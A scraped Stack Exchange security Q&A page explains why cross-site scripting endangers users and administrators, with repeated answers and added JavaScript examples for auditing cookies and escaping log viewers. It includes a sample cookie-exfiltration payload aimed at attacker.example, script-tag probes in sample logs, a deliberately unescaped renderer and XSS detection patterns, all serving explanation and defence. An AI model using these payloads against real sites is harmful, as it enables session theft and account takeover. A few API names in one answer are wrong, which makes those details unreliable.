



How dangerous is XSS



I am a software engineer and have been watching a lot of videos about XSS. But I fail to understand how is it dangerous if it runs on the client side and does not execute on the server side which contains the databases, and many important files.










  • 1





    It's as dangerous as a friend lying to your face about pretty important stuff. In the above analogy, the friend is the genuine web application and the face is its user interface.

    – user101
    20 hours ago












  • Are you asking about the dangers to the server, then?

    – schroeder
    17 hours ago






  • 2





    What you seem to be missing is that it's dangerous to your user more than to your server.

    – jpmc26
    10 hours ago











  • @Schroeder I wanted to know why XSS is considered dangerous even though it does not do any harm to the server on which the application is hosted.

    – Sai Kumar
    10 hours ago






  • 3





    But you are aware that it is dangerous to clients, right?

    – schroeder
    9 hours ago















Tags: web-application, xss, vulnerability






asked 23 hours ago by Sai Kumar; edited 17 hours ago by schroeder





6 Answers
Below are the things an attacker can do if there is an XSS vulnerability. Content taken from the somdev blog.


  • Ad-Jacking - If you manage to get stored XSS on a website, just
    inject your ads in it to make money ;)

  • Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.

  • Session Hijacking - HTTP cookies can be accessed
    by JavaScript if the HttpOnly flag is not present on the cookies.

  • Content Spoofing - JavaScript has full access to the client-side code of
    a web app and hence you can use it to show/modify desired content.

  • Credential Harvesting - The most fun part. You can use a fancy popup
    to harvest credentials. "WiFi firmware has been updated, re-enter your
    credentials to authenticate."

  • Forced Downloads - So the victim isn't
    downloading your malicious flash player from absolutely-safe.com?
    Don't worry, you will have more luck trying to force a download from
    the trusted website your victim is visiting.

  • Crypto Mining - Yes, you
    can use the victim's CPU to mine some bitcoin for you!

  • Bypassing CSRF
    protection - You can make POST requests with JavaScript, you can
    collect and submit a CSRF token with JavaScript, what else do you
    need?

  • Keylogging - You know what this is.

  • Recording Audio - It
    requires authorization from the user, but you can access the victim's
    microphone. Thanks to HTML5 and JavaScript.

  • Taking pictures - It
    requires authorization from the user, but you can access the victim's webcam.
    Thanks to HTML5 and JavaScript.

  • Geo-location - It requires
    authorization from the user, but you can access the victim's geo-location.
    Thanks to HTML5 and JavaScript. Works better with devices with GPS.

  • Stealing HTML5 web storage data - HTML5 introduced a new feature, web
    storage. Now a website can store data in the browser for later use
    and of course, JavaScript can access that storage via
    window.localStorage() and window.webStorage()

  • Browser & System Fingerprinting - JavaScript makes it a piece of cake to find your
    browser name, version, installed plugins and their versions, your
    operating system, architecture, system time, language and screen
    resolution.

  • Network Scanning - The victim's browser can be abused to scan
    ports and hosts with JavaScript.

  • Crashing Browsers - Yes! You can
    crash browsers by flooding them with....stuff.

  • Stealing Information -
    Grab information from the webpage and send it to your server. Simple!

  • Redirecting - You can use JavaScript to redirect users to a webpage
    of your choice.

  • Tabnabbing - Just a fancy version of redirection.
    For example, if no keyboard or mouse events have been received for
    more than a minute, it could mean that the user is AFK and you can
    sneakily replace the current webpage with a fake one.

  • Capturing
    Screenshots - Thanks to HTML5 again, now you can take a screenshot of a
    webpage. Blind XSS detection tools have been doing this before it was
    cool.

  • Perform Actions - You are controlling the browser,






  • 1





    So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?

    – Sai Kumar
    9 hours ago







  • 1





    It still depends on how the attacker programs it: basically depending on user events, or triggering the code at specific time intervals.

    – Goron
    9 hours ago











  • @SaiKumar Only in that tab.

    – immibis
    5 hours ago
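The "Session Hijacking" bullet above hinges on one cookie attribute. The following is an added example (not part of the answer or the quoted blog) that parses Set-Cookie headers, reports which cookies a payload such as `new Image().src = 'https://attacker.example/?c=' + document.cookie` would actually be able to read, and flags the attributes a reviewer checks together. The cookie names, values and the attacker host are constructed for illustration.

```javascript
// Added example: which cookies an XSS payload can read via document.cookie,
// and which Set-Cookie headers leave a session exposed. All cookie names,
// values and hosts below are constructed, not taken from any real site.

// Parse one Set-Cookie header into { name, value, attrs }. Attribute names
// are lower-cased because browsers match them case-insensitively.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, value, attrs };
}

// Report what is missing on a cookie from an XSS standpoint. HttpOnly is the
// attribute that decides whether document.cookie exposes it; Secure and
// SameSite are listed because a review checks all three together.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!c.attrs.secure) findings.push('missing Secure: also sent over plain HTTP');
  if (!c.attrs.samesite) findings.push('missing SameSite: sent on cross-site requests');
  return { name: c.name, findings };
}

// Simulate what the payload's collector receives: document.cookie only
// contains cookies that were set without HttpOnly.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample response headers: one session cookie set properly,
// one legacy session cookie set with no attributes, one preference cookie.
const SAMPLE_HEADERS = [
  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'legacy_session=def456; Path=/',
  'theme=dark; Path=/; Max-Age=31536000',
];

// What the attacker would see for this response, and why.
console.log('exfiltrated:', cookiesVisibleToScript(SAMPLE_HEADERS));
for (const h of SAMPLE_HEADERS) console.log(auditSetCookie(h));
```

For the sample headers, only `legacy_session` and `theme` reach the attacker. Note the limit of this defence: HttpOnly stops the cookie from being copied out, not the attack. Script running in the page still sends authenticated requests with that cookie attached and can read a CSRF token straight out of the DOM, which is the "Bypassing CSRF protection" bullet above.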


















Attacker-controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page etc. This means it can both steal secrets which are inside this page (passwords etc.) and also do things as the logged-in client (like buy something, send bomb threats in a mail client ...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently being attacked.






    When XSS was first becoming widely known in the web application
    security community, some professional penetration testers were
    inclined to regard XSS as a “lame” vulnerability




    source: Web Application Hackers Handbook



    XSS is a command injection of the client side, like the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking where the attacker using javascript makes the victim transmit session cookies to an attacker-controlled server and from there the attacker can perform "session riding".



    But XSS can also result in complete application takeover. Consider a scenario in which you inject javascript and it gets stored. The admin then loads that into a web browser (usually logs or CMS). If an XSS is present there you now have the admin session tokens. That is why XSS can be very dangerous.






    • Not just stored XSS but what if you send a malicious URL to the admin? The same threat applies.

      – schroeder
      17 hours ago











    • Absolutely. I didn't write it because I only wanted to add to what Steffen wrote.

      – Vipul Nair
      8 hours ago


















    Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your user getting their accounts on your website compromised or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.



    But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some javascript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see javascript snippets in the HTTP headers of the bots which try to hack your website.
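The log-viewer scenario in this answer (and the stored-XSS-to-admin path in the earlier answers) is worth seeing end to end. The following is an added example, not code from any of the answers: it parses combined-format access log lines, shows the vulnerable viewer that concatenates the User-Agent straight into HTML beside a viewer that escapes it, and adds a triage function that flags the log lines carrying injection attempts, which is the detection side of the same problem. The log lines, IP addresses and attacker host are constructed.

```javascript
// Added example: a stored-XSS path through an admin log viewer, plus a
// detector for the log lines that carry the payload. Log lines, addresses
// and the attacker host are constructed for illustration.

// Escape the five characters that matter when inserting untrusted text into
// an HTML element body or a double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Combined log format: ip - - [time] "request" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], request: m[3], status: m[4], referer: m[6], userAgent: m[7] };
}

// Vulnerable viewer: client-controlled header values go into the HTML as-is,
// so a User-Agent containing <script> runs in the admin's browser.
function renderLogVulnerable(entry) {
  return `<tr><td>${entry.ip}</td><td>${entry.request}</td><td>${entry.userAgent}</td></tr>`;
}

// Hardened viewer: every untrusted field is escaped at the point of output.
function renderLogSafe(entry) {
  return `<tr><td>${escapeHtml(entry.ip)}</td><td>${escapeHtml(entry.request)}</td><td>${escapeHtml(entry.userAgent)}</td></tr>`;
}

// Triage heuristic for fields a client controls: tag openers, event
// handler attributes, javascript: URLs, and the percent-encoded '<' that
// shows up in the request line. Case-insensitive; not a parser.
const XSS_INDICATORS = [/<\s*script/i, /<\s*(img|svg|iframe)\b/i, /\bon\w+\s*=/i, /javascript:/i, /%3c\s*script/i];

// Return one hit per log line whose request, referer or user-agent matches.
function findInjectionAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const e = parseLogLine(line);
    if (!e) continue;
    for (const [field, value] of [['request', e.request], ['referer', e.referer], ['userAgent', e.userAgent]]) {
      if (XSS_INDICATORS.some((re) => re.test(value))) {
        hits.push({ ip: e.ip, field, value });
        break;
      }
    }
  }
  return hits;
}

// Constructed sample log: a normal request, a probe carrying the payload in
// User-Agent, and one carrying it percent-encoded in the request line.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Mar/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Mar/2019:10:00:02 +0000] "GET /login HTTP/1.1" 200 812 "-" "<script src=//attacker.example/x.js></script>"',
  '198.51.100.7 - - [10/Mar/2019:10:00:03 +0000] "GET /?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "curl/7.64"',
];

const probe = parseLogLine(SAMPLE_LOG[1]);
console.log(renderLogVulnerable(probe)); // live <script> tag reaches the admin's page
console.log(renderLogSafe(probe));       // same line rendered as inert text
console.log(findInjectionAttempts(SAMPLE_LOG));
```

The escaping shown is correct only for the HTML body and quoted-attribute contexts the viewer uses; a value placed inside a script block, a URL or a CSS value needs the encoding for that context instead. A Content-Security-Policy that disallows inline script and foreign script sources is the usual second layer, so that a missed escape in one viewer does not hand over the admin session.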






      An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:



      • Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.

      • Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.

      • Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.

      • Someone puts some javascript in there that makes your site unusable or even crash browsers. Again, should be obvious why this is bad.

      • Someone puts DDOS code in your site to try take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off if you do not fix your site for breach of contract.

      • Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.

      • Someone uses it to snoop on your users. Hel-lo, breach of GDPR.





        It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.



        But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.






        • Why the downvote? OP said they fail to see the danger because it "does not execute on the server side which contains the databases, and many important files. "

          – User42
          17 hours ago











        Your Answer








        StackExchange.ready(function()
        var channelOptions =
        tags: "".split(" "),
        id: "162"
        ;
        initTagRenderer("".split(" "), "".split(" "), channelOptions);

        StackExchange.using("externalEditor", function()
        // Have to fire editor after snippets, if snippets enabled
        if (StackExchange.settings.snippets.snippetsEnabled)
        StackExchange.using("snippets", function()
        createEditor();
        );

        else
        createEditor();

        );

        function createEditor()
        StackExchange.prepareEditor(
        heartbeatType: 'answer',
        autoActivateHeartbeat: false,
        convertImagesToLinks: false,
        noModals: true,
        showLowRepImageUploadWarning: true,
        reputationToPostImages: null,
        bindNavPrevention: true,
        postfix: "",
        imageUploader:
        brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
        contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
        allowUrls: true
        ,
        noCode: true, onDemand: true,
        discardSelector: ".discard-answer"
        ,immediatelyShowMarkdownHelp:true
        );



        );






        Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.









        draft saved

        draft discarded


















        StackExchange.ready(
        function ()
        StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f206520%2fhow-dangerous-is-xss%23new-answer', 'question_page');

        );

        Post as a guest















        Required, but never shown

























        6 Answers
        6






        active

        oldest

        votes








        6 Answers
        6






        active

        oldest

        votes









        active

        oldest

        votes






        active

        oldest

        votes









        27














        Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog





        • Ad-Jacking - If you manage to get stored XSS on a website, just
          inject your ads in it to make money ;)


        • Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.

        • Session Hijacking - HTTP cookies can be accessed
          by JavaScript if the HTTP ONLY flag is not present in the cookies.


        • Content Spoofing - JavaScript has full access to client side code of
          a web app and hence you can use it show/modify desired content.


        • Credential Harvesting - The most fun part. You can use a fancy popup
          to harvest credentials. WiFi firmware has been updated, re-enter your
          credentials to authenticate. Forced Downloads - So the victim isn’t
          downloading your malicious flash player from absolutely-safe.com?
          Don’t worry, you will have more luck trying to force a download from
          the trusted website your victim is visiting.


        • Crypto Mining - Yes, you
          can use the victim’s CPU to mine some bitcoin for you!


        • Bypassing CSRF
          protection - You can make POST requests with JavaScript, you can
          collect and submit a CSRF token with JavaScript, what else do you
          need?


        • Keylogging - You know what this is.


        • Recording Audio - It
          requires authorization from the user but you access victim’s
          microphone. Thanks to HTML5 and JavaScript.


        • Taking pictures - It
          requires authorization from the user but you access victim’s webcam.
          Thanks to HTML5 and JavaScript.


        • Geo-location - It requires
          authorization from the user but you access victim’s Geo-location.
          Thanks to HTML5 and JavaScript. Works better with devices with GPS.


        • Stealing HTML5 web storage data - HTML5 introduced a new feature, web
          storage. Now a website can store data in the browser for later use
          and of course, JavaScript can access that storage via
          window.localStorage() and window.webStorage() Browser & System


        • Fingerprinting - JavaScript makes it a piece of cake to find your
          browser name, version, installed plugins and their versions, your
          operating system, architecture, system time, language and screen
          resolution.


        • Network Scanning - Victim’s browser can be abused to scan
          ports and hosts with JavaScript.


        • Crashing Browsers - Yes! You can
          crash browser with flooding them with….stuff.


        • Stealing Information -
          Grab information from the webpage and send it to your server. Simple!


        • Redirecting - You can use javascript to redirect users to a webpage
          of your choice.


        • Tabnapping - Just a fancy version of redirection.
          For example, if no keyboard or mouse events have been received for
          more than a minute, it could mean that the user is afk and you can
          sneakily replace the current webpage with a fake one.


        • Capturing
          Screenshots - Thanks to HTML5 again, now you can take screenshot of a
          webpage. Blind XSS detection tools have been doing this before it was
          cool.


        • Perform Actions - You are controlling the browser,







        share|improve this answer




















        • 1





          So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?

          – Sai Kumar
          9 hours ago







        • 1





          It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.

          – Goron
          9 hours ago











        • @SaiKumar Only in that tab.

          – immibis
          5 hours ago















        27














        Below are the things an attacker can do if there is XSS vulnerability. Content taken from somdev blog





        • Ad-Jacking - If you manage to get stored XSS on a website, just
          inject your ads in it to make money ;)


        • Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.

        • Session Hijacking - HTTP cookies can be accessed
          by JavaScript if the HTTP ONLY flag is not present in the cookies.


        • Content Spoofing - JavaScript has full access to client side code of
          a web app and hence you can use it show/modify desired content.


        • Credential Harvesting - The most fun part. You can use a fancy popup
          to harvest credentials. WiFi firmware has been updated, re-enter your
          credentials to authenticate. Forced Downloads - So the victim isn’t
          downloading your malicious flash player from absolutely-safe.com?
          Don’t worry, you will have more luck trying to force a download from
          the trusted website your victim is visiting.


        • Crypto Mining - Yes, you
          can use the victim’s CPU to mine some bitcoin for you!


        • Bypassing CSRF
          protection - You can make POST requests with JavaScript, you can
          collect and submit a CSRF token with JavaScript, what else do you
          need?


        • Keylogging - You know what this is.


        • Recording Audio - It
          requires authorization from the user but you access victim’s
          microphone. Thanks to HTML5 and JavaScript.


        • Taking pictures - It
          requires authorization from the user but you access victim’s webcam.
          Thanks to HTML5 and JavaScript.


        • Geo-location - It requires
          authorization from the user but you access victim’s Geo-location.
          Thanks to HTML5 and JavaScript. Works better with devices with GPS.


        • Stealing HTML5 web storage data - HTML5 introduced a new feature, web
          storage. Now a website can store data in the browser for later use
          and of course, JavaScript can access that storage via
          window.localStorage() and window.webStorage() Browser & System


        • Fingerprinting - JavaScript makes it a piece of cake to find your
          browser name, version, installed plugins and their versions, your
          operating system, architecture, system time, language and screen
          resolution.


        • Network Scanning - Victim’s browser can be abused to scan
          ports and hosts with JavaScript.


        • Crashing Browsers - Yes! You can
          crash browser with flooding them with….stuff.


        • Stealing Information -
          Grab information from the webpage and send it to your server. Simple!


        • Redirecting - You can use javascript to redirect users to a webpage
          of your choice.


        • Tabnapping - Just a fancy version of redirection.
          For example, if no keyboard or mouse events have been received for
          more than a minute, it could mean that the user is afk and you can
          sneakily replace the current webpage with a fake one.


        • Capturing
          Screenshots - Thanks to HTML5 again, now you can take screenshot of a
          webpage. Blind XSS detection tools have been doing this before it was
          cool.


        • Perform Actions - You are controlling the browser,







        share|improve this answer




















        • 1





          So I have one question.. Let's say a web app had an xss vulnerability, and someone had used this to exploit some other user by running some malicious js code. Let's say this code key logs and sends the key strokes to another website by making a request. Now will this malicious js code keep running as long as the browser is open or will it keep running as long as the vulnerable tab within the browser is open?

          – Sai Kumar
          9 hours ago







        • 1





          It still depends on how the attacker program's it. basically depending on user events or triggering the code on specific time intervals.

          – Goron
          9 hours ago











        • @SaiKumar Only in that tab.

          – immibis
          5 hours ago













        27












        27








        27







        Below are the things an attacker can do if there is an XSS vulnerability. Content taken from somdev blog.

        • Ad-Jacking - If you manage to get stored XSS on a website, just inject your ads in it to make money ;)

        • Click-Jacking - You can create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.

        • Session Hijacking - HTTP cookies can be accessed by JavaScript if the HttpOnly flag is not present in the cookies.

        • Content Spoofing - JavaScript has full access to the client-side code of a web app and hence you can use it to show/modify desired content.

        • Credential Harvesting - The most fun part. You can use a fancy popup to harvest credentials. "WiFi firmware has been updated, re-enter your credentials to authenticate."

        • Forced Downloads - So the victim isn't downloading your malicious flash player from absolutely-safe.com? Don't worry, you will have more luck trying to force a download from the trusted website your victim is visiting.

        • Crypto Mining - Yes, you can use the victim's CPU to mine some bitcoin for you!

        • Bypassing CSRF protection - You can make POST requests with JavaScript, you can collect and submit a CSRF token with JavaScript, what else do you need?

        • Keylogging - You know what this is.

        • Recording Audio - It requires authorization from the user, but you can access the victim's microphone. Thanks to HTML5 and JavaScript.

        • Taking pictures - It requires authorization from the user, but you can access the victim's webcam. Thanks to HTML5 and JavaScript.

        • Geo-location - It requires authorization from the user, but you can access the victim's geo-location. Thanks to HTML5 and JavaScript. Works better with devices with GPS.

        • Stealing HTML5 web storage data - HTML5 introduced a new feature, web storage. Now a website can store data in the browser for later use and of course, JavaScript can access that storage via window.localStorage() and window.webStorage().

        • Browser & System Fingerprinting - JavaScript makes it a piece of cake to find your browser name, version, installed plugins and their versions, your operating system, architecture, system time, language and screen resolution.

        • Network Scanning - The victim's browser can be abused to scan ports and hosts with JavaScript.

        • Crashing Browsers - Yes! You can crash browsers by flooding them with... stuff.

        • Stealing Information - Grab information from the webpage and send it to your server. Simple!

        • Redirecting - You can use JavaScript to redirect users to a webpage of your choice.

        • Tabnabbing - Just a fancy version of redirection. For example, if no keyboard or mouse events have been received for more than a minute, it could mean that the user is AFK and you can sneakily replace the current webpage with a fake one.

        • Capturing Screenshots - Thanks to HTML5 again, now you can take a screenshot of a webpage. Blind XSS detection tools have been doing this before it was cool.

        • Perform Actions - You are controlling the browser,







        edited 10 hours ago
        Anders

        answered 20 hours ago
        Goron

        • So I have one question. Let's say a web app had an XSS vulnerability, and someone had used this to exploit some other user by running some malicious JS code. Let's say this code key-logs and sends the key strokes to another website by making a request. Now will this malicious JS code keep running as long as the browser is open, or will it keep running as long as the vulnerable tab within the browser is open?
          – Sai Kumar
          9 hours ago

        • It still depends on how the attacker programs it, basically depending on user events or triggering the code on specific time intervals.
          – Goron
          9 hours ago

        • @SaiKumar Only in that tab.
          – immibis
          5 hours ago
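The "Session Hijacking" item in the list above hinges on one cookie attribute: whether the session cookie carries HttpOnly. The following is an added example, not code from the answer or from the blog it quotes. It parses Set-Cookie header values and reports the attributes a reviewer would look for before calling a session cookie safe against script on the same origin. The header strings are constructed for the example; the cookie name `sessionid` and the value are placeholders.

```javascript
// Added example, not code from the answer above: audit a Set-Cookie header for
// the attributes that limit what injected script can do with a session cookie.
// HttpOnly keeps the value out of document.cookie, Secure keeps it off plaintext
// HTTP, and SameSite limits when the browser attaches it to cross-site requests.
// The header strings below are constructed for this example.

const SAMPLE_SET_COOKIE_HEADERS = [
  // Weak: only a Path attribute; readable by any script running on the origin.
  'sessionid=5f4dcc3b; Path=/',
  // Hardened: the three attributes an XSS-conscious deployment sets.
  'sessionid=5f4dcc3b; Path=/; HttpOnly; Secure; SameSite=Lax',
];

// Parse one Set-Cookie header value into name, value and the security attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [nameValue = '', ...attributes] = parts;
  const eq = nameValue.indexOf('=');
  const cookie = {
    name: eq === -1 ? nameValue : nameValue.slice(0, eq),
    value: eq === -1 ? '' : nameValue.slice(eq + 1),
    httpOnly: false,
    secure: false,
    sameSite: null, // 'Strict', 'Lax', 'None', or null when not set
  };
  for (const attribute of attributes) {
    const [rawKey, rawValue = ''] = attribute.split('=');
    const key = rawKey.trim().toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = rawValue.trim() || null;
  }
  return cookie;
}

// Return the findings a reviewer would raise for a session cookie header.
function auditSessionCookie(header) {
  const cookie = parseSetCookie(header);
  const findings = [];
  if (!cookie.httpOnly) {
    findings.push('missing HttpOnly: value is readable through document.cookie by injected script');
  }
  if (!cookie.secure) {
    findings.push('missing Secure: cookie is also sent over plaintext HTTP');
  }
  if (cookie.sameSite === null || cookie.sameSite.toLowerCase() === 'none') {
    findings.push('SameSite not set or None: cookie rides along on cross-site requests');
  }
  return { name: cookie.name, findings };
}

// Audit a list of headers and keep only the cookies that have findings.
function auditAll(headers) {
  return headers.map(auditSessionCookie).filter((result) => result.findings.length > 0);
}

for (const header of SAMPLE_SET_COOKIE_HEADERS) {
  const result = auditSessionCookie(header);
  console.log(header);
  console.log(result.findings.length ? result.findings.map((f) => '  - ' + f).join('\n') : '  ok');
}
```

One caveat worth keeping in mind when reading the audit output: HttpOnly only stops the token from being read out and exfiltrated. Script that is already running in the page can still issue requests that the browser authenticates with that cookie, which is the "do things as the logged-in client" point made in other answers on this page.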












        9














        Attacker-controlled code which runs within the context of the web application on the client side has full control over what the client does and can also read the DOM of the HTML page, etc. This means it can both steal secrets which are inside this page (passwords, etc.) and also do things as the logged-in client (like buy something, or send bomb threats in a mail client...). Note that this kind of activity can often be hidden from the client so that he does not realize that he is currently being attacked.






            answered 22 hours ago
            Steffen Ullrich





















                4















                When XSS was first becoming widely known in the web application
                security community, some professional penetration testers were
                inclined to regard XSS as a “lame” vulnerability.

                source: Web Application Hacker's Handbook

                XSS is a command injection on the client side; as the other user pointed out, it can result in any action that can be performed by the user. Mostly XSS is used for session hijacking, where the attacker, using JavaScript, makes the victim transmit session cookies to an attacker-controlled server, and from there the attacker can perform "session riding".

                But XSS can also result in complete application takeover. Consider a scenario in which you inject JavaScript and it gets stored. The admin then loads that into a web browser (usually logs or a CMS). If an XSS is present there, you now have the admin's session tokens. That is why XSS can be very dangerous.






                edited 17 hours ago
                schroeder

                answered 21 hours ago
                Vipul Nair

                • Not just stored XSS, but what if you send a malicious URL to the admin? The same threat applies.
                  – schroeder
                  17 hours ago

                • Absolutely. I didn't write it because I only wanted to add to what Steffen wrote.
                  – Vipul Nair
                  8 hours ago

















                3














                Most of the possible consequences of XSS vulnerabilities affect the user, not your server. So if you don't care about your users getting their accounts on your website compromised, or your users seeing content on your website which doesn't come from your server, sure, ignore those vulnerabilities.

                But if your users have admin rights, then an XSS vulnerability can easily lead to unintentional admin actions. A classic case of that is a log viewer in your admin area which isn't XSS-proof. Some JavaScript snippets in your access logs might get executed by your admins and perform administrative actions under their account. This is why you sometimes see JavaScript snippets in the HTTP headers of the bots which try to hack your website.






                    answered 11 hours ago
                    Philipp
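Both this answer and Vipul Nair's above describe the same escalation path: user-supplied strings end up in an admin-only page (a log viewer, a CMS) and run there with the admin's session. The following is an added example, not code from either answer. It parses combined-format access-log lines, shows the unescaped row rendering that makes the log viewer exploitable next to the escaped version, and runs a detector over the lines that flags the markup-carrying requests and User-Agent strings bots send in the hope an admin will view them. The three log lines are constructed for the example; the IP addresses are from documentation ranges and the payloads are the textbook probes, not anything taken from a real log.

```javascript
// Added example, not code from any of the answers above: the admin log viewer
// scenario. Access-log fields are attacker-controlled input; rendering them
// into HTML unescaped is the flaw, escaping them is the fix, and the detector
// flags the markup-carrying requests that bots send in the hope an admin views
// the logs. All log lines below are constructed for this example.

// Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
const SAMPLE_ACCESS_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /login HTTP/1.1" 200 1024 "-" "<script>alert(document.cookie)</script>"',
  '192.0.2.5 - - [10/Oct/2023:13:57:12 +0000] "GET /?q=<img src=x onerror=alert(1)> HTTP/1.1" 404 0 "-" "curl/8.0"',
];

const LOG_LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// Split one combined-format line into named fields; null when it does not parse.
function parseLogLine(line) {
  const m = LOG_LINE_RE.exec(line);
  if (!m) return null;
  return {
    ip: m[1], time: m[2], request: m[3], status: Number(m[4]),
    bytes: m[5], referer: m[6], userAgent: m[7],
  };
}

// Escape the five characters that matter in an HTML text or quoted-attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The flaw: request and User-Agent strings concatenated straight into markup,
// so a <script> in the log runs in the admin's session when the page is viewed.
function renderRowUnsafe(entry) {
  return `<tr><td>${entry.ip}</td><td>${entry.request}</td><td>${entry.userAgent}</td></tr>`;
}

// The fix: every untrusted field escaped for the context it lands in.
function renderRowSafe(entry) {
  return `<tr><td>${escapeHtml(entry.ip)}</td><td>${escapeHtml(entry.request)}</td><td>${escapeHtml(entry.userAgent)}</td></tr>`;
}

// Detection: a tag, an inline event handler, or a javascript: URL inside a
// field that should only ever hold a path, a referer or a product token.
const MARKUP_RE = /<\s*\/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i;

function findMarkupInLogs(lines) {
  const hits = [];
  lines.forEach((line, index) => {
    const entry = parseLogLine(line);
    if (!entry) return;
    for (const field of ['request', 'referer', 'userAgent']) {
      if (MARKUP_RE.test(entry[field])) hits.push({ line: index, ip: entry.ip, field });
    }
  });
  return hits;
}

for (const hit of findMarkupInLogs(SAMPLE_ACCESS_LOG)) {
  console.log(`line ${hit.line}: markup in ${hit.field} from ${hit.ip}`);
}
```

The detector is deliberately narrow (tags, `on*=` handlers, `javascript:`) so it stays readable; it is a triage aid for spotting who is probing the log viewer, not a substitute for escaping. The escaping in `renderRowSafe` is what actually closes the hole, and it has to be applied in every context the field is written into, not only table cells.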





















                        1














                        An XSS attack is not a danger to the server. It's a danger to the reason you have a server. Not in a technical sense but very much a human one, as any kind of XSS attack originating from your site usually ends with your reputation down the toilet. A few test cases:

                        • Someone redirects from your site to a fake login page. Now you have a potential mass security breach of user accounts on your site.

                        • Someone puts a cryptominer on your site. This will make your visitors' machines work overtime and, when spotted, makes you look either grossly greedy and/or grossly incompetent as a sysadmin. Neither of which is a good look.

                        • Someone redirects traffic from your site to a competitor. I shouldn't have to explain why this is bad.

                        • Someone puts some JavaScript in there that makes your site unusable or even crashes browsers. Again, should be obvious why this is bad.

                        • Someone puts DDoS code in your site to try to take down your site or a third party. If aimed at you, should be obvious why this is bad. If aimed at someone else and your site is deemed culpable, your hosting provider can cut you off for breach of contract if you do not fix your site.

                        • Someone replaces your ads with their own. If you rely on ad revenue, they're stealing that revenue.

